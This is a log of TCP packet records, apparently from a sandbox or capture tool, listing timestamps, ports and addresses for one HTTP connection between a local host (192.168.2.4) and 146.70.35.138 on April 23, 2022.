Apr 23, 2022 08:12:20.658361912 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.658396959 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.658418894 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.658421040 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.658428907 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.662350893 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.662430048 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.698306084 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698357105 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698399067 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698427916 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698467970 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698508978 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698546886 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698574066 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698613882 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698613882 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.698651075 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698656082 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.698674917 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.698692083 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698704958 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.698720932 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698761940 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698795080 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.698807955 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.698842049 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.776896954 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.800626993 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151750088 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151791096 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151819944 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151839018 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151865005 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151890993 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151916027 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151933908 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151958942 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.151981115 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.151984930 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.152013063 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.152030945 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.152031898 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.152045965 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.152050972 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.152076006 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.152092934 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.191756964 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.191807032 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.191836119 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.191871881 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.191878080 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.191915035 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.191930056 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.191934109 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.191953897 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.191955090 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192009926 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192009926 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192038059 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192061901 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192137003 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192178011 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192213058 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192222118 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192238092 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192260981 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192301035 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192313910 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192331076 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192358017 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192400932 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192442894 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192456961 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192470074 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192497969 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192509890 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192540884 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.192564011 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.192586899 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.231730938 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.231781960 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.231817007 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.231880903 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.231909037 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.231935024 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.231950998 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.231980085 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.231992006 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232021093 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232122898 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232151985 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232172966 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232187033 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232191086 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232269049 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232482910 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232541084 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232568979 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232570887 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232610941 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232629061 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232664108 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.232671976 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.232719898 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.271845102 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.271897078 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.271924973 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.271928072 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.271966934 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.271967888 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272027969 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272028923 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272062063 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272087097 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272104025 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272146940 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272154093 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272175074 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272202015 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272217989 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272258997 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272260904 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272286892 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272310019 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272387981 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272443056 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272449017 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272504091 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272659063 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272723913 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272727013 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272761106 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272780895 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272820950 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272861004 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.272871017 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.272923946 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.311638117 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.311677933 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.311692953 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.311712027 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.311734915 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.311748981 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.311892033 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.311938047 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.312145948 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312172890 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312189102 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312232018 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.312515974 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312540054 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312556982 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312581062 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312598944 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312623024 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.312671900 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.312839985 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312865019 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312880039 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312903881 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312907934 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.312927961 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312944889 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.312959909 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.313005924 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.313044071 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.313069105 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.313082933 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.313112974 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.313148975 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.313199997 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.313252926 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.351893902 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.351959944 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.351999998 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352032900 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352050066 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352075100 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352091074 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352133036 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352174997 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352294922 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352358103 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352400064 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352400064 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352446079 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352448940 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352488041 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.352562904 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.352577925 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353316069 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353373051 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353411913 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353462934 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353466988 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353501081 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353517056 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353553057 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353593111 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353605986 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353607893 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353663921 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353699923 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353701115 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353748083 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.353750944 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.353852987 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.391968012 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392033100 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392081022 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392147064 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392149925 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392163038 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392193079 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392196894 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392220020 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392251968 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392302990 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392306089 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392338037 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392354965 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392385960 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392421007 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.392432928 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.392477036 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.393404961 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393459082 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393479109 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.393492937 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393498898 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.393539906 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393591881 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.393611908 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393649101 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393696070 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393742085 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393760920 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.393779993 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393784046 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.393817902 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.393872976 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.432259083 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432308912 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432337046 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432369947 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432403088 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432425976 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432461023 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432496071 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432521105 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432539940 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.432554960 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432591915 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432615995 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432625055 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.432650089 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432677031 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.432684898 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.432745934 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.433655977 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433711052 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433742046 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433763027 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.433789968 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433840990 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433856964 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.433873892 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433921099 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433927059 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.433969021 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.433995008 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.433996916 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.434031963 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.434039116 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.434084892 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.472415924 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472440958 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472454071 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472470045 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472482920 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472563982 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.472615004 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.472786903 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472805977 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472816944 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472862959 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.472902060 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472903013 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.472915888 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.472954988 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.472971916 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.473431110 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473449945 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473462105 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473478079 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473490000 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473510027 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.473530054 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.473704100 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473721981 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473733902 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473769903 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.473771095 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473789930 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473798990 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.473803043 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:21.473815918 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:21.473844051 CEST   49766        80         192.168.2.4    146.70.35.138
                                          Apr 23, 2022 08:12:21.473989010 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474005938 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474019051 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474049091 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.474066973 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.474081039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474133015 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.512749910 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512794018 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512830019 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512856007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512880087 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512937069 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.512996912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513096094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513139009 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513155937 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513175011 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513200045 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513200998 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513227940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513231039 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513273954 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513854027 CEST8049766146.70.35.138192.168.2.4
